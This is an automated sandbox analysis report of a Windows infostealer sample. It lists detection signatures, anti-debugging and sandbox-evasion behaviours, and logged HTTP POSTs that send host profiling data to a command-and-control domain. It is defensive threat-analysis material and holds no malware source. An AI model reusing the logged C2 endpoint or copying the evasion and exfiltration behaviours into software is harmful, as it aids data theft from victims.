Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ZFttiy4Tt8.exe

Overview

General Information

Sample name:ZFttiy4Tt8.exe
renamed because original name is a hash value
Original sample name:8cb06b0904107a21706822f2f2d90832.exe
Analysis ID:1581610
MD5:8cb06b0904107a21706822f2f2d90832
SHA1:37dee7617a62f9a5e5853cc977a125be54ac58b7
SHA256:05dd7b104f2c11892363053cfa4d3feed76b39614b34764ac571893b9495e2c4
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • ZFttiy4Tt8.exe (PID: 5260 cmdline: "C:\Users\user\Desktop\ZFttiy4Tt8.exe" MD5: 8CB06B0904107A21706822F2F2D90832)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: ZFttiy4Tt8.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: ZFttiy4Tt8.exeVirustotal: Detection: 55%Perma Link
Source: ZFttiy4Tt8.exeReversingLabs: Detection: 60%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: ZFttiy4Tt8.exeJoe Sandbox ML: detected
Source: ZFttiy4Tt8.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: mov dword ptr [ebp+04h], 424D53FFh2_2_00E5A5B0
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: mov dword ptr [ebx+04h], 424D53FFh2_2_00E5A7F0
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: mov dword ptr [edi+04h], 424D53FFh2_2_00E5A7F0
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: mov dword ptr [esi+04h], 424D53FFh2_2_00E5A7F0
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: mov dword ptr [edi+04h], 424D53FFh2_2_00E5A7F0
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: mov dword ptr [esi+04h], 424D53FFh2_2_00E5A7F0
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: mov dword ptr [ebx+04h], 424D53FFh2_2_00E5A7F0
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: mov dword ptr [ebx+04h], 424D53FFh2_2_00E5B560
Source: ZFttiy4Tt8.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00DF255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,2_2_00DF255D
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00DF29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,2_2_00DF29FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 567271Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 35 32 31 33 32 31 34 30 30 30 31 32 34 36 33 34 34 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c 2
Source: global trafficHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 143Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 81.29.149.125 81.29.149.125
Source: Joe Sandbox ViewIP Address: 3.218.7.103 3.218.7.103
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00EBA8C0 recvfrom,2_2_00EBA8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fiveth5ht.top
Source: unknownHTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 567271Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 35 32 31 33 32 31 34 30 30 30 31 32 34 36 33 34 34 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c 2
Source: ZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
Source: ZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
Source: ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: ZFttiy4Tt8.exe, 00000002.00000002.2285359627.0000000000869000.00000004.00000020.00020000.00000000.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2249242290.0000000000867000.00000004.00000020.00020000.00000000.sdmp, ZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2249195460.0000000000862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: ZFttiy4Tt8.exe, 00000002.00000002.2285359627.0000000000869000.00000004.00000020.00020000.00000000.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2249242290.0000000000867000.00000004.00000020.00020000.00000000.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2249195460.0000000000862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868624fd4
Source: ZFttiy4Tt8.exe, 00000002.00000002.2285359627.0000000000869000.00000004.00000020.00020000.00000000.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2249242290.0000000000867000.00000004.00000020.00020000.00000000.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2249195460.0000000000862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868626963
Source: ZFttiy4Tt8.exe, 00000002.00000002.2289092739.0000000007510000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=
Source: ZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: ZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
Source: ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: ZFttiy4Tt8.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: ZFttiy4Tt8.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: ZFttiy4Tt8.exe, ZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: ZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
Source: ZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443

System Summary

barindex
PE file contains section with special chars
Source: ZFttiy4Tt8.exeStatic PE information: section name:
Source: ZFttiy4Tt8.exeStatic PE information: section name: .idata
Source: ZFttiy4Tt8.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00E005B02_2_00E005B0
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00E06FA02_2_00E06FA0
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00EBB1802_2_00EBB180
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00E2F1002_2_00E2F100
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00EC00E02_2_00EC00E0
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_0117A0002_2_0117A000
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_0117E0502_2_0117E050
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00E562102_2_00E56210
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00EBC3202_2_00EBC320
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00EC04202_2_00EC0420
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_011444102_2_01144410
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_011567302_2_01156730
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_011747802_2_01174780
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00DFE6202_2_00DFE620
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00E5A7F02_2_00E5A7F0
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00EBC7702_2_00EBC770
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00E049402_2_00E04940
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00DFA9602_2_00DFA960
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00EAC9002_2_00EAC900
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_010AAB2C2_2_010AAB2C
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00FC6AC02_2_00FC6AC0
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_01168BF02_2_01168BF0
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00DFCBB02_2_00DFCBB0
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00F84B602_2_00F84B60
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_010AAAC02_2_010AAAC0
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_01174D402_2_01174D40
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_0116CD802_2_0116CD80
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_0117CC902_2_0117CC90
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_01142F902_2_01142F90
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_0110AE302_2_0110AE30
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00EBEF902_2_00EBEF90
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00EB8F902_2_00EB8F90
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00E14F702_2_00E14F70
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00E010E62_2_00E010E6
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_011635B02_2_011635B0
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_0115D4302_2_0115D430
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_011817A02_2_011817A0
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_011456D02_2_011456D0
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_011499202_2_01149920
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00EA98802_2_00EA9880
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_01161BD02_2_01161BD0
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00E31BE02_2_00E31BE0
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: String function: 00E34FD0 appears 232 times
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: String function: 00DF71E0 appears 43 times
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: String function: 00DFCAA0 appears 62 times
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: String function: 00FA7220 appears 90 times
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: String function: 00E34F40 appears 298 times
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: String function: 00E35340 appears 41 times
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: String function: 00E0CCD0 appears 53 times
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: String function: 00E0CD40 appears 73 times
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: String function: 00ED44A0 appears 62 times
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: String function: 00DF73F0 appears 107 times
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: String function: 00E350A0 appears 86 times
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: String function: 00DF75A0 appears 627 times
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: String function: 00FCCBC0 appears 93 times
Source: ZFttiy4Tt8.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: ZFttiy4Tt8.exeStatic PE information: Section: ivnslrrb ZLIB complexity 0.9946421030405406
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00DF255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,2_2_00DF255D
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeCode function: 2_2_00DF29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,2_2_00DF29FF
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: ZFttiy4Tt8.exeVirustotal: Detection: 55%
Source: ZFttiy4Tt8.exeReversingLabs: Detection: 60%
Source: ZFttiy4Tt8.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: ZFttiy4Tt8.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeSection loaded: napinsp.dllJump to behavior
